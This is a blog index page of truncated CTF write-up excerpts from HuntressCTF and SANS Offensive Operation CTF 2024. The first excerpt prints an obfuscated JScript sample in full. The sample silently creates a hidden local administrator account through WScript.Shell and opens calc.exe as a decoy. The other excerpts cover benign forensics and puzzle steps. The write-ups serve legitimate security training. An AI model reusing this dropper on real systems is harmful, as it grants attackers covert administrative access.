2024 HuntressCTF - StrangeCalc

2024-10-01

Summary

Steps

type u2POGqu61l.js

function a(b){var c="",d=b.split("\n");for(var e=0;e<d.length;e++){var f=d[e].replace(/^\s+|\s+$/g,'');if(f.indexOf("begin")===0||f.indexOf("end")===0||f==="")continue;var g=(f.charCodeAt(0)-32)&63;for(var h=1;h<f.length;h+=4){if(h+3>=f.length)break;var i=(f.charCodeAt(h)-32)&63,j=(f.charCodeAt(h+1)-32)&63,k=(f.charCodeAt(h+2)-32)&63,l=(f.charCodeAt(h+3)-32)&63;c+=String.fromCharCode((i<<2)|(j>>4));if(h+2<f.length-1)c+=String.fromCharCode(((j&15)<<4)|(k>>2));if(h+3<f.length-1)c+=String.fromCharCode(((k&3)<<6)|l)}}return c.substring(0,g)}var m="begin 644 -\nG9FQA9WLY.3(R9F(R,6%A9C$W-3=E,V9D8C(X9#<X.3!A-60Y,WT*\n`\nend";var n=a(m);var o=["net user LocalAdministrator "+n+" /add","net localgroup administrators LocalAdministrator /add","calc.exe"];var p=new ActiveXObject('WScript.Shell');for(var q=0;q<o.length-1;q++){p.Run(o[q],0,false)}p.Run(o[2],1,false);

Using ChatGPT, I prompted it to beautify the code giving me a result of:

function decode(input) { var result = ""; var lines = input.split("\n"); for (var i = 0; i < lines.length; i++) { var line = lines[i].replace(/^\s+|\s+$/g, ''); // Skip lines that start with "begin", "end" or are empty if (line.

Continue reading 


2024 HuntressCTF - TXT Message

2024-10-01

Summary

Author: @JohnHammond

Hmmm, have you seen some of the strange DNS records for the ctf.games domain? One of them sure is odd...

Steps

In the challenge description, the od was a hyperlink to https://en.wikipedia.org/wiki/Od_(Unix). My first assumption was that I’m going to have to use the OD utility to decode the text. I performed an nslookup against the TXT type and received this response:

nslookup -type=txt ctf.games Server: 192.168.240.2 Address: 192.

Continue reading 


2024 SANS Offensive Operation CTF - BadFish::002-004

2024-02-28 | #img

Summary

Uh Oh it seems a few bad fish got into the fish tank! Can you find them all? Zip Password: bAdFi5h DISCLAIMER: Flag will start with the number of the challenge it belongs to.

Badfish 002

I first started by mounting the img file.

sudo mount -o loop,offset=$((2048 * 512)) badfish.img /mnt/bf

Next, I started to enumerate the files and discovered the second flag in /home/nemo/.bashrc.

Badfish 003

Moving forward, I discovered the third flag in the /usr/bin/ directory as a suspected binary called 3_5tr1nGs_r_BaD_4_f15H.

Continue reading 


2024 SANS Offensive Operation CTF - In Between The Lines 001-002

2024-02-28 | #convert #gif

Summary

Hey check out this awesome gif I found!

Steps

The gif file has one image that contains a flag near the top right corner, but as you see, it's quite difficult to see without modification. I used the utility convert from ImageMagick to expand the gif into individual images. I used the following syntax to achieve this.

convert chall.gif chall.png

Now, I had multiple chall.png files for each frame of the gif.

Continue reading 


2024 SANS Offensive Operation CTF - JavaScript Stage 001-003

2024-02-28 | #javascript

Summary

We heard you like JavaScript? So we scrambled some nice JavaScript ☕ code for you to review! Review the provided code snippet and send appropriate API request to get the flag!

JavaScript 001

Using the provided JavaScript, I used the browser's console to help piece together the string. As we see in the screenshot, the value for "b" + "a" + +"a" + "a" is equal to baNaNa. This happens because the JavaScript is processing the space and reporting it as NaN (Not-a-Number).

Continue reading 